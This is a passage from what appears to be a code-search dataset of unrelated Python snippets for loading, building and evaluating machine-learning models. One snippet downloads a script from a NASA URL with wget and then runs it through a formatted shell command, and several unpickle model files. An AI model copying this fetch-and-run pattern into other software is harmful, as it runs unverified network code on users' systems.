dataset_params['max_seq_len'])\n print('<', ' '.join([target_vocab.idx2item[idx]\n for idx in predicted_idx]))\n else:\n _evaluate(indexes, encoder, decoder, target_vocab, checkpoint,\n dataset_params)", "def _load_model_from_trained_params(self):\n self.ent_emb = tf.constant(self.trained_model_params[0])\n self.rel_emb = tf.constant(self.trained_model_params[1])", "def load_model():\n \n _files = training_file()\n \n predictor_path = _files.model_file(LANDMARKS_WEIGHTS)\n face_rec_model_path = _files.model_file(RESNET_WEIGHTS)\n \n detector = dlib.get_frontal_face_detector()\n sp = dlib.shape_predictor(predictor_path)\n facerec = dlib.face_recognition_model_v1(face_rec_model_path)\n \n return (detector, sp, facerec)", "def build_model():", "def evaluate(args):\n dataset_param_filepath = os.path.join(args.model, 'dataset.params')\n dataset_params = putils.load_params(dataset_param_filepath)\n left_vocab_filepath = os.path.join(args.model, 'left.vocab')\n left_vocab = Vocab(vocab_filepath=left_vocab_filepath)\n right_vocab_filepath = os.path.join(args.model, 'right.vocab')\n right_vocab = Vocab(vocab_filepath=right_vocab_filepath)\n model_params_filepath = os.path.join(args.model, 'model.params')\n model_params = putils.load_params(model_params_filepath)\n checkpoint_filepath = os.path.join(args.model, 'checkpoint.tar')\n if not torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location=const.DEVICE)\n elif torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath)\n elif torch.cuda.is_available() and not model_params['cuda']:\n logger.info('Loading a CPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location='cuda:0')\n else:\n logger.info('Loading a CPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath)\n if checkpoint['encoder']['model_type'] == 'transformer':\n encoder = TEncoder(input_size=checkpoint['encoder']['input_size'],\n hidden_size=checkpoint['encoder']['hidden_size'],\n num_layers=checkpoint['encoder']['num_layers'],\n dropout=checkpoint['encoder']['dropout'],\n num_attention_heads=checkpoint['encoder']['num_attention_heads'])\n else:\n encoder = Encoder(model_type=checkpoint['encoder']['model_type'],\n input_size=checkpoint['encoder']['input_size'],\n hidden_size=checkpoint['encoder']['hidden_size'],\n num_layers=checkpoint['encoder']['num_layers'],\n nonlinearity=checkpoint['encoder']['nonlinearity'],\n bias=checkpoint['encoder']['bias'],\n dropout=checkpoint['encoder']['dropout'],\n bidirectional=checkpoint['encoder']['bidirectional'])\n if checkpoint['decoder']['model_type'] == 'transformer':\n decoder = TDecoder(hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n num_layers=checkpoint['decoder']['num_layers'],\n dropout=checkpoint['decoder']['dropout'],\n num_attention_heads=checkpoint['decoder']['num_attention_heads'])\n elif checkpoint['decoder']['with_attention']:\n decoder = Attention(hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n max_seq_len=dataset_params['max_seq_len'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'])\n else:\n decoder = Decoder(model_type=checkpoint['decoder']['model_type'],\n hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'])\n encoder.load_state_dict(checkpoint['encoder_state_dict'])\n decoder.load_state_dict(checkpoint['decoder_state_dict'])\n if torch.cuda.is_available():\n encoder.to(const.DEVICE)\n decoder.to(const.DEVICE)\n encoder.eval()\n decoder.eval()\n pairs = putils.convert_to_seq_pairs(args.data)\n indexed_pairs = putils.index_pairs(pairs, left_vocab.char2idx,\n right_vocab.char2idx)\n if dataset_params['reverse']:\n indexed_pairs = [(y, x) for x, y in indexed_pairs]\n source_vocab = right_vocab\n target_vocab = left_vocab\n else:\n source_vocab = left_vocab\n target_vocab = right_vocab\n if args.random > 0:\n random.shuffle(indexed_pairs)\n for seq_num in range(args.random):\n seq = indexed_pairs[seq_num]\n print('-'*80)\n input_str = ' '.join(\n ''.join([source_vocab.idx2char[idx] for idx in seq[0] if idx\n not in [const.SOS_IDX, const.EOS_IDX]])\n .split(const.SEP))\n gold_str = ' '.join(\n ''.join([target_vocab.idx2char[idx] for idx in seq[1] if idx\n not in [const.SOS_IDX, const.EOS_IDX]])\n .split(const.SEP))\n predicted_idxx = decode(seq[0], args.itemize, encoder, decoder,\n dataset_params['max_seq_len'])\n pred_str = ' '.join(\n ''.join([target_vocab.idx2char[idx] for idx in predicted_idxx\n if idx not in [const.SOS_IDX, const.EOS_IDX]])\n .split(const.SEP))\n print('>', input_str)\n print('=', gold_str)\n print('<', pred_str)\n else:\n _evaluate(indexed_pairs, args.itemize, encoder, decoder,\n target_vocab.idx2char, dataset_params['max_seq_len'])", "def load_model():\n prepro = Prepro(PATH_STOPSWORD, PATH_ACRONYM)\n vectorizer = joblib.load(PATH_TFIDF)\n label_encoder = joblib.load(PATH_ENCODER)\n model_svm = joblib.load(PATH_SVM)\n model_nb = joblib.load(PATH_NB)\n model_lr = joblib.load(PATH_LR)\n return prepro, vectorizer, label_encoder, model_svm, model_nb, model_lr", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def load_model(self):\n if self.ckpt_flag:\n LOG('Skip Loading Pre-trained Model......')\n else:\n if self.params.pre_trained_from is not None and os.path.exists(self.params.pre_trained_from):\n try:\n LOG('Loading Pre-trained Model at %s' % self.params.pre_trained_from)\n pretrain = torch.load(self.params.pre_trained_from)\n self.network.load_state_dict(pretrain)\n LOG('Pre-trained Model Loaded!')\n except:\n WARNING('Cannot load pre-trained model. Start training......')\n else:\n WARNING('Pre-trained model do not exits. Start training......')", "def rl_modelrl_ae_base():\n hparams = rl_modelrl_base()\n hparams.ppo_params = \"ppo_pong_ae_base\"\n hparams.generative_model_params = \"basic_conv_ae\"\n hparams.autoencoder_train_steps = 100000\n return hparams", "def _train_model(self):\n raise NotImplementedError()", "def rl_modelrl_ae_tiny():\n hparams = rl_modelrl_tiny()\n hparams.ppo_params = \"ppo_pong_ae_base\"\n hparams.generative_model_params = \"basic_conv_ae\"\n hparams.autoencoder_train_steps = 20\n return hparams", "def custom_model():\n\t# initialize the model\n\t# load weights from path\n\t# returns model\n\tmodel = mlp.get_training_model()\n\tmodel.load_state_dict(torch.load(\"model_wt.pth\"))\n\treturn model", "def model() -> Any:\n with open(\"airbnb_regressor.pickle\",\"rb\") as f:\n model = pickle.load(f)\n return model", "def load_trained_model(filename = 'pricing_model.p'):\n # with ZipFile(\"model.zip\",\"r\") as w:\n # w.extractall()\n \n with open(filename, 'rb') as model:\n pricingmodel = pickle.load(model)\n \n # pricingmodel.Model_made = tf.keras.models.load_model(\"Model_made.h5\")\n # pricingmodel.Model_claim = tf.keras.models.load_model(\"Model_claim.h5\")\n \n \n return pricingmodel", "def _load_model(self):\n self._load_scaler('scaler.save')\n self._load_encoder('encoder0.save', 0)\n self._load_encoder('encoder1.save', 1)\n self._load_neural_network('model.json', 'model.h5')\n return", "def predict():\n\n predict_cfg = get_predict_args()\n device = get_device()\n print(device)\n\n # load checkpoint\n ckpt_path = find_ckpt_in_directory(predict_cfg.ckpt)\n ckpt = torch.load(ckpt_path, map_location=device)\n best_iter = ckpt[\"best_iter\"]\n cfg = ckpt[\"cfg\"]\n aspect = cfg[\"aspect\"]\n\n for k, v in cfg.items():\n print(\"{:20} : {:10}\".format(k, str(v)))\n\n eval_batch_size = 64\n\n print(\"Loading data\")\n dev_data = list(beer_reader(cfg[\"dev_path\"]))\n test_data = beer_annotations_reader(cfg[\"test_path\"], aspect=aspect)\n\n print(\"dev\", len(dev_data))\n print(\"test\", len(test_data))\n\n print(\"Loading pre-trained word embeddings\")\n vocab = Vocabulary()\n vectors = load_embeddings(cfg[\"embeddings\"], vocab) # required for vocab\n\n # build model\n model = build_model(cfg[\"model\"], vocab, cfg=cfg)\n\n # load parameters from checkpoint into model\n print(\"Loading saved model..\")\n model.load_state_dict(ckpt[\"state_dict\"])\n model.to(device)\n print(\"Done\")\n\n print(model)\n print_parameters(model)\n\n print(\"Evaluating\")\n dev_eval = evaluate_loss(\n model, dev_data, batch_size=eval_batch_size,\n device=device, cfg=cfg)\n test_eval = evaluate_loss(\n model, test_data, batch_size=eval_batch_size,\n device=device, cfg=cfg)\n\n if hasattr(model, \"z\"):\n path = os.path.join(\n cfg[\"save_path\"], \"final_rationales.txt\")\n test_precision, test_macro_prec = evaluate_rationale(\n model, test_data, aspect=aspect, device=device,\n batch_size=eval_batch_size, path=path)\n else:\n test_precision = 0.\n test_macro_prec = 0.\n test_eval[\"precision\"] = test_precision\n test_eval[\"macro_precision\"] = test_macro_prec\n\n dev_s = make_kv_string(dev_eval)\n test_s = make_kv_string(test_eval)\n\n print(\"best model iter {:d} dev {} test {}\".format(\n best_iter, dev_s, test_s))", "def pretrained(name=\"pos_anc\", lang=\"en\", remote_loc=None):\n from sparknlp.pretrained import ResourceDownloader\n return ResourceDownloader.downloadModel(PerceptronModel, name, lang, remote_loc)", "def load_model():\r\n global model # 下面的那个predict也是要用的 所以在这里定义为全局\r\n model = DenseNet(n_input_channels=1, num_init_features=64,\r\n growth_rate=32,\r\n block_config=(3, 6, 12, 8), num_classes=4).to(device)\r\n model.load_state_dict(torch.load(\"./model29.pkl\"))\r\n model.eval()", "def load_model(self) -> Any:", "def make_model(self):\n if self.model_type=='densenet_121':\n model = self.make_densenet_121(self.weights)\n\n\n return model", "def makeModel(self):\n\n # Get the script\n modelScript = os.path.join(self.datapath, 'make3FGLxml.py')\n if not os.path.isfile(modelScript):\n # download it\n print(\"\\t=== Downloading make3FGLxml.py ===\")\n os.system('wget https://fermi.gsfc.nasa.gov/ssc/data/analysis/user/make3FGLxml.py -O {}'.format(modelScript))\n\n # Create the model using Tyrel's script\n galModel = os.path.join(self.diffpath, 'gll_iem_v06.fits')\n isoModel = os.path.join(self.diffpath, 'iso_'+self.irf+'_v06.txt')\n if (not os.path.isfile(galModel)) or (not os.path.isfile(isoModel)):\n print(\"\\t=== Unable to find the diffuse models, check the variable '$FERMI_DIR' ===\")\n return\n if not os.path.isdir(self.extpath):\n print(\"\\t=== Unable to find models of extended sources, check the variable '$LATEXTDIR' ===\")\n return\n if not os.path.isfile(self.fermicat):\n # download it\n print(\"\\t=== Downloading 3FGL catalog ===\")\n os.system('wget https://fermi.gsfc.nasa.gov/ssc/data/access/lat/4yr_catalog/gll_psc_v16.fit -O {}'.format(self.fermicat))\n\n os.popen(\"python {} {} {} -o {} -G {} -g 'gll_iem_v06'\\\n -I {} -i 'iso_source_v06' -e {} -r 5 -R 10 -ER 10\\\n -s 9 -m False -GIF False\".format(modelScript, self.fermicat,\n self.ft1, self.model, galModel, isoModel, self.extpath))\n\n # Add the target to the model\n tmpName = self.model + '.tmp'\n rfil = open(self.model, 'r')\n wfil = open(tmpName, 'w')\n # Copy the XML to the temporary model\n wfil.writelines([l for l in rfil.readlines() if not l=='</source_library>']) # copy everything but the last line\n wfil.write(' <source ROI_Center_Distance=\"0.00\" name=\"TARGET\" type=\"PointSource\">\\n')\n wfil.write(' <spectrum type=\"PowerLaw2\">\\n')\n wfil.write(' <parameter free=\"1\" max=\"1000\" min=\"1e-05\" name=\"Integral\" scale=\"1e-08\" value=\"0.3591824258\"/>\\n')\n wfil.write(' <parameter free=\"1\" max=\"1\" min=\"-5\" name=\"Index\" scale=\"1\" value=\"-2.7\"/>\\n')\n wfil.write(' <parameter free=\"0\" max=\"1000000\" min=\"20\" name=\"LowerLimit\" scale=\"1\" value=\"100\"/>\\n')\n wfil.write('<parameter free=\"0\" max=\"1000000\" min=\"20\" name=\"UpperLimit\" scale=\"1\" value=\"100000\"/>\\n')\n wfil.write(' </spectrum>\\n')\n wfil.write(' <spatialModel type=\"SkyDirFunction\">\\n')\n wfil.write(' <parameter free=\"0\" max=\"360.0\" min=\"-360.0\" name=\"RA\" scale=\"1.0\" value=\"'+str(self.ra)+'\"/>\\n')\n wfil.write(' <parameter free=\"0\" max=\"360.0\" min=\"-360.0\" name=\"DEC\" scale=\"1.0\" value=\"'+str(self.dec)+'\"/>\\n')\n wfil.write(' </spatialModel>\\n')\n wfil.write(' </source>\\n')\n wfil.write('</source_library>\\n')\n rfil.close()\n wfil.close()\n\n os.remove(self.model)\n os.rename(tmpName, self.model)\n \n print(\"\\t=== Source model {} added ===\".format(self.model))\n return", "def mtf_transformer_lm_moe():\n hparams = mtf_transformer.mtf_transformer_lm_baseline()\n hparams.decoder_layers = [\"att\", \"moe\"] * 4\n moe.set_default_moe_hparams(hparams)\n hparams.mesh_shape = \"all:8\"\n hparams.layout = \"batch:all;experts:all\"\n return hparams", "def load_model(file_index):\n normal, abnormal, all = read_in(file_index, 1, 2, 0.3)\n autoencoder = keras.models.load_model('Working_Data/ae_patient_' + str(file_index) + '_dim' + str(100) + '_model.h5')\n reconstructed = autoencoder.predict(all)\n reconstruction_save = \"Working_Data/reconstructed_cdae_10d_Idx\" + str(file_index) + \".npy\"\n np.save(reconstruction_save, reconstructed)", "def __init__(self):\n # self.model = get_pretrained_model()\n self.tokenizer = get_tokenizer()\n self.model = transformers.Trainer(model=get_pretrained_model())\n self.summarizer = pipeline(\"summarization\") # ~1.2 GB download the first time this is run.", "def resnet46(pretrained=False):\n model = ResNet(BasicBlock, [3, 6, 10, 3])\n if pretrained:\n pass\n #model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))\n return model", "def load_model(self):\n if os.stat('code/lr-model.pt').st_size == 0:\n return\n params = torch.load('code/lr-model.pt')\n self.set_params(params)", "def load_trained_model(unit):\n return load_model(DATA_FOLDER + \"{}_cdae_model.hd5\".format(UNITS[unit]))", "def __init__(self, n_feature, n_hidden, n_output):\n super(simpleAE, self).__init__()\n self.Encoder = Encoder(n_feature, n_hidden)\n self.Decoder = Decoder(n_hidden, n_output)\n self.model_name = 'simpleAE'", "def load_model():\n return \"None\"", "def main(args):\n bad_words_file = codecs.open(args.language + \"/feature_files/bad_words\", \"r\", \"utf-8\").readlines()\n bad_words = read_known_words(bad_words_file)\n \n good_words_file = codecs.open(args.language + \"/feature_files/good_words\", \"r\", \"utf-8\").readlines()\n good_words = read_known_words(good_words_file)\n\n curse_words_file = codecs.open(args.language + \"/feature_files/curse_words\", \"r\", \"utf-8\").readlines()\n curse_words = read_known_words(curse_words_file)\n\n prepositions_file = codecs.open(args.language + \"/feature_files/prepositions\", \"r\", \"utf-8\").readlines()\n prepositions = read_known_words(prepositions_file)\n\n determiners_file = codecs.open(args.language + \"/feature_files/determiners\", \"r\", \"utf-8\").readlines()\n determiners = read_known_words(determiners_file)\n\n syllables_file = codecs.open(args.language + \"/feature_files/syllables\", \"r\", \"utf-8\").readlines()\n syllable_structure = read_syllables_file(syllables_file)\n\n other_feature_files = glob.glob(args.language + \"/feature_files/*.txt\")\n other_features = set_features_from_files(other_feature_files)\n \n ermaObj = ConllToErma(args, bad_words, good_words, curse_words, prepositions, \\\n determiners, syllable_structure, other_features)\n\n if not args.just_test:\n # Input training file.\n train_id = open(args.train, \"r\")\n train = train_id.readlines()\n train_id.close()\n sys.stdout.write(\"Reading training file...\\n\")\n (train_features, train_skip_chains) = ermaObj.read_conll_file(train)\n sys.stdout.write(\"Building model...\\n\")\n train_hash = ermaObj.make_nodes(train_features)\n # Freeze the known features based on what's seen in the training data\n ermaObj.cutoff_features()\n else:\n train_hash = {}\n train_skip_chains = {}\n # Input testing file.\n test_id = open(args.test, \"r\")\n test = test_id.readlines()\n test_id.close()\n sys.stdout.write(\"Reading test file...\\n\")\n (test_features, test_skip_chains) = ermaObj.read_conll_file(test)\n sys.stdout.write(\"Building model...\\n\")\n test_hash = ermaObj.make_nodes(test_features, test=True)\n ermaObj.write_out(train_hash, train_skip_chains, test_hash, test_skip_chains)", "def load_model(self):\n self.pred_net.load((self.save_path / \"iqn_pred_net\").absolute().as_posix())\n self.target_net.load((self.save_path / \"iqn_target_net\").absolute().as_posix())", "def load_model(model_path):\n nlp = spacy.blank('en') \n if 'ner' not in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner)\n #load pretrained model from the path\n ner = nlp.from_disk(model_path)\n return ner", "def load_model():\r\n model = MobileNetV2(weights=\"imagenet\")\r\n print(\"Model loaded\")\r\n return model", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def main():\n data = load_data()\n analyze_features(data['full_features'])\n model = train(data)\n\n with open('model.pickle', 'wb') as f:\n pickle.dump(model, f)\n evaluate(model, data)", "def initiate(self):\n # if self.opt.checkpoint_encoder:\n # self.load(self.opt.checkpoint_encoder, self.opt.checkpoint_decoder)\n # else:\n # start fresh.\n self.model = Transformer(\n self.opt.src_vocab_size,\n self.opt.tgt_vocab_size,\n self.opt.max_token_seq_len,\n tgt_emb_prj_weight_sharing=self.opt.proj_share_weight,\n emb_src_tgt_weight_sharing=self.opt.embs_share_weight,\n d_k=self.opt.d_k,\n d_v=self.opt.d_v,\n d_model=self.opt.d_model,\n d_word_vec=self.opt.d_word_vec,\n d_inner=self.opt.d_inner_hid,\n n_layers=self.opt.layers,\n n_head=self.opt.n_head,\n dropout=self.opt.dropout).to(self.device)\n \n for p in self.model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)", "def build_model():\n model = Sequential()\n model.add(Dense(beer_emb.EMB_DIM, activation=\"relu\",\n input_dim=beer_emb.EMB_DIM))\n model.add(Dropout(0.5))\n model.add(Dense(64, activation=\"relu\"))\n model.add(Dropout(0.5))\n model.add(Dense(32, activation=\"relu\"))\n model.add(Dense(1, activation='sigmoid'))\n model.compile(loss='binary_crossentropy',\n metrics=['accuracy'], optimizer='adam')\n\n return model", "def __call__(self):\n custom_obj = {'tf': tf, 'relu6': tf.nn.relu6}\n wfile = self._get_model_weights()\n model = tf.keras.models.load_model(wfile, custom_objects=custom_obj)\n\n if not self._trainable:\n # freeze encoder layers up to\n # expanded_conv_16_project_BN\n for layer in model.layers[1:147]:\n layer.trainable = False\n\n return model", "def densenet201(pretrained=False, **kwargs):\n model = ResNetFeatures(BasicBlock, [3, 4, 6, 3], **kwargs)\n if pretrained:\n _load_pretrained(model, model_zoo.load_url(model_urls['densenet201']))\n return model", "def build_model(config):\n # Load the pretrained model\n detr = get_detr_model(config, include_top=True, weights=\"detr\")\n detr.summary()\n return detr", "def esm1_t34_670M_UR100():\n return load_model_and_alphabet_hub(\"esm1_t34_670M_UR100\")", "def get_model(n_obs=100, ess=50, ug=None, seed_obs=None):\n if ug is None:\n ug = np.zeros((4, 4))\n ug[0, 1:3] = 1\n ug[1:3, 0] = 1\n\n m = elfi.new_model()\n priors = []\n dag, node_ordering, oc = ug_to_dag(ug)\n para_mat = mn_para_mat(ug)\n combs_to_node = 2 ** np.sum(dag, axis=0)\n n_dim = np.sum(combs_to_node).astype(int)\n alpha = ess / 2 / oc.shape[0] * np.ones(n_dim)\n no_connections = np.where(np.sum(dag, axis=0) == 0)[0].astype(int)\n alpha[no_connections] = ess / 2\n\n for i in np.arange(n_dim):\n name_prior = 'a_{}'.format(i)\n prior_beta = elfi.Prior('beta',\n alpha[i],\n alpha[i],\n model=m,\n name=name_prior)\n priors.append(prior_beta)\n\n sim_fn = partial(gmn_simulate,\n ug=ug,\n n=n_obs,\n ess=ess,\n dag=dag,\n node_ordering=node_ordering,\n oc=oc,\n para_mat=para_mat)\n a_true = 0.2 * np.ones((n_dim, 1))\n y = sim_fn(a_true)\n\n elfi.Simulator(sim_fn, *priors, observed=y, name='GMN')\n elfi.Summary(sumstats, m['GMN'], oc.shape[0], n_obs, name='S')\n elfi.Distance('euclidean', m['S'], name='d')\n\n return m", "def build(model_name):\n return pretrain.factory.create(model_name)", "def load_openai_pretrained_model(model, cfg, n_special, dir):\n n_ctx = cfg.n_ctx\n n_embd = cfg.n_embd\n n_transfer = cfg.n_layer\n # Load weights from TF model\n print(\"Loading weights...\")\n names = json.load(open(dir + 'parameters_names.json'))\n shapes = json.load(open(dir + 'params_shapes.json'))\n offsets = np.cumsum([np.prod(shape) for shape in shapes])\n init_params = [np.load(dir + 'params_{}.npy'.format(n)) for n in range(10)]\n init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]\n init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]\n if n_ctx > 0:\n init_params[0] = init_params[0][:n_ctx]\n if n_special > 0:\n init_params[0] = np.concatenate(\n [init_params[1],\n (np.random.randn(n_special, n_embd) * 0.02).astype(np.float32),\n init_params[0]\n ], 0)\n else:\n init_params[0] = np.concatenate(\n [init_params[1],\n init_params[0]\n ], 0)\n del init_params[1]\n if n_transfer == -1:\n n_transfer = 0\n else:\n n_transfer = 1 + n_transfer * 12\n init_params = [arr.squeeze() for arr in init_params]\n\n try:\n assert model.embed.weight.shape == init_params[0].shape\n except AssertionError as e:\n e.args += (model.embed.weight.shape, init_params[0].shape)\n raise\n\n model.embed.weight.data = torch.from_numpy(init_params[0])\n\n for name, ip in zip(names[1:n_transfer], init_params[1:n_transfer]):\n name = name[6:] # skip \"model/\"\n assert name[-2:] == \":0\"\n name = name[:-2]\n name = name.split('/')\n pointer = model\n for m_name in name:\n if re.fullmatch(r'[A-Za-z]+\\d+', m_name):\n l = re.split(r'(\\d+)', m_name)\n else:\n l = [m_name]\n pointer = getattr(pointer, l[0])\n if len(l) >= 2:\n num = int(l[1])\n pointer = pointer[num]\n try:\n assert pointer.shape == ip.shape\n except AssertionError as e:\n e.args += (pointer.shape, ip.shape)\n raise\n pointer.data = torch.from_numpy(ip)", "def bisenet_face_parsing():\r\n network = BiSeNet_keras()\r\n network.load_weights(MODEL_PATH)\r\n return network", "def convert_to_model(self, *args):", "def load_model():\n global obj\n obj = NutritionTableDetector()\n print(\"Weights Loaded!\")", "def model_fn(model_dir):\n\n model = BertForSequenceClassification.from_pretrained('cl-tohoku/bert-base-japanese-whole-word-masking', \n num_labels=1)\n model = torch.nn.DataParallel(model)\n with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:\n model.load_state_dict(torch.load(f))\n \n return {\"net\": model, \"tokenizer\": tokenizer}", "def pretrained(name=\"elmo\", lang=\"en\", remote_loc=None):\n from sparknlp.pretrained import ResourceDownloader\n return ResourceDownloader.downloadModel(ElmoEmbeddings, name, lang, remote_loc)", "def loadModel(self):\n self.model.load_state_dict(torch.load(os.path.join(self.model_save_dir, '{}_trained.pt'.format(self.model_name)), map_location=torch.device(device)))\n return self.model", "def load_model(self, filename):\r\n pass", "def load_fasttext_en_pretrained():\r\n log.info(\"Load FT Model\")\r\n path = Path.join(package_path, 'augmentation', 'data', 'fasttext_en', 'cc.en.300.bin')\r\n\r\n if not Path.isfile(path):\r\n raise ValueError(\"Fast Text Pretrained Model is not available, please run: `from seaqube import download;download('fasttext-en-pretrained')`\")\r\n\r\n with open(path, 'rb') as fin:\r\n return PreTrainedFTRawEN(load(fin))", "def test_model_loading(self):\n\n inputs = tf.placeholder(dtype=tf.int32, shape=[None, None])\n\n for pretrained_model_name in XLNetEncoder.available_checkpoints():\n encoder = XLNetEncoder(pretrained_model_name=pretrained_model_name)\n _ = encoder(inputs)", "def get_pretrained_model(model_name, n_classes):\n\n if model_name == 'vgg16':\n model = models.vgg16(pretrained=True)\n\n # Freeze early layers\n for param in model.parameters():\n param.requires_grad = False\n n_inputs = model.classifier[6].in_features\n\n # Add on classifier\n model.classifier[6] = nn.Sequential(\n nn.Linear(n_inputs, 256), nn.ReLU(), nn.Dropout(0.2),\n nn.Linear(256, n_classes), nn.LogSoftmax(dim=1))\n\n elif model_name == 'resnet50':\n model = models.resnet50(pretrained=True)\n\n for param in model.parameters():\n param.requires_grad = False\n\n n_inputs = model.fc.in_features\n model.fc = nn.Sequential(\n nn.Linear(n_inputs, 256), nn.ReLU(), nn.Dropout(0.2),\n nn.Linear(256, n_classes), nn.LogSoftmax(dim=1))\n\n # Move to gpu and parallelize\n if train_on_gpu:\n model = model.to('cuda')\n\n if multi_gpu:\n model = nn.DataParallel(model)\n\n return model", "def test_load_model():\n spectrum_binner, test_generator = get_test_binner_and_generator()\n\n model_file = TEST_RESOURCES_PATH / \"testmodel.hdf5\"\n model = load_model(model_file)\n assert model.spectrum_binner.__dict__ == spectrum_binner.__dict__, \"Expected different spectrum binner\"\n\n # Test model layer shapes\n assert model.model.layers[2].to_json() == model.base.to_json(), \\\n \"Expected based model to be identical to part of main model.\"\n\n # Test base model inference\n X, y = test_generator.__getitem__(0)\n embeddings = model.base.predict(X[0])\n assert isinstance(embeddings, np.ndarray), \"Expected numpy array\"\n assert embeddings.shape[0] == test_generator.settings[\"batch_size\"] == 32, \\\n \"Expected different batch size\"\n assert embeddings.shape[1] == model.base.output_shape[1] == 200, \\\n \"Expected different embedding size\"", "def resnet():\n return models.resnet152(pretrained=True)", "def test_fer_model(img_folder, model=\"/path/to/model\"):\n preds = None\n ### Start your code here\n\n if not os.path.exists(model):\n print (\"Model Loading Error: can't find the model.\\n\")\n return None\n\n if not os.path.exists(img_folder):\n print (\"Data Loading Error: can't find the data.\\n\")\n return None\n\n with open(model, 'rb') as model_file:\n model = load(model_file)\n data = load_FER2013_samples(img_folder)\n preds = model.predict(data)\n print (preds)\n ### End of code\n return preds", "def transformerXLModel(*args, **kwargs):\n model = TransfoXLModel.from_pretrained(*args, **kwargs)\n return model", "def model_fn(model_dir):\n model = models.resnet50(pretrained=True)\n\n _ = model.eval()\n\n modules=list(model.children())[:-1]\n model=nn.Sequential(*modules)\n for p in model.parameters():\n p.requires_grad = False\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else \"cpu\")\n\n model = model.to(device)\n\n return model", "def load_model(self):\n pass", "def get_model():\n # Load the pretrained model.\n model = torchvision.models.resnet34(pretrained=True)\n\n # Resize model for our task.\n model.conv1 = torch.nn.Conv2d(1, 64, kernel_size=3, stride=1, padding=1,\n bias=False)\n model.avgpool = torch.nn.AvgPool2d(2)\n model.fc = torch.nn.Linear(in_features=512, out_features=10, bias=True)\n\n return model", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def get_model():\n model = ecole.scip.Model.from_file(str(DATA_DIR / \"bppc8-02.mps\"))\n model.disable_cuts()\n model.disable_presolve()\n model.set_param(\"randomization/permuteconss\", True)\n model.set_param(\"randomization/permutevars\", True)\n model.set_param(\"randomization/permutationseed\", 784)\n model.set_param(\"randomization/randomseedshift\", 784)\n model.set_param(\"randomization/lpseed\", 784)\n return model", "def _trainedmodel(continuous, modelform, Vr, m=20):\n if continuous == \"inferred\":\n ModelClass = roi._core.InferredContinuousROM\n elif continuous:\n ModelClass = roi._core._ContinuousROM\n else:\n ModelClass = roi._core._DiscreteROM\n\n n,r = Vr.shape\n c, A, H, Hc, G, Gc, B = _get_operators(r, m)\n operators = {}\n if \"c\" in modelform:\n operators['c_'] = c\n if \"A\" in modelform:\n operators['A_'] = A\n if \"H\" in modelform:\n operators['Hc_'] = Hc\n if \"G\" in modelform:\n operators['Gc_'] = Gc\n if \"B\" in modelform:\n operators['B_'] = B\n\n model = roi._core.trained_model_from_operators(ModelClass, modelform,\n Vr, **operators)\n model.datacond_ = np.random.random()\n model.dataregcond_ = model.datacond_ / 2\n model.residual_ = np.random.random()\n model.misfit_ = model.residual_ / 2\n\n return model", "def build_model(cfg, char_voca, word_voca=None, gazet=None, pos_voca=None):\n\n # Build Embedder\n embedder = Embedder(\n window=cfg.window,\n char_voca=char_voca,\n word_voca=word_voca,\n jaso_dim=cfg.jaso_dim,\n char_dim=cfg.char_dim,\n word_dim=cfg.word_dim,\n gazet=gazet,\n gazet_embed=True,\n pos_enc=True,\n phoneme=True,\n pos_voca_size=len(pos_voca),\n pos_dim=cfg.pos_dim)\n\n print('Total Embedding_size: ', embedder.embed_dim)\n\n\n encoder_name, decoder_name = cfg.model_name.lower().split('-')\n\n # Build Encoder\n if encoder_name == 'fnn5':\n encoder = models.Fnn5(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn7':\n encoder = models.Cnn7(in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif 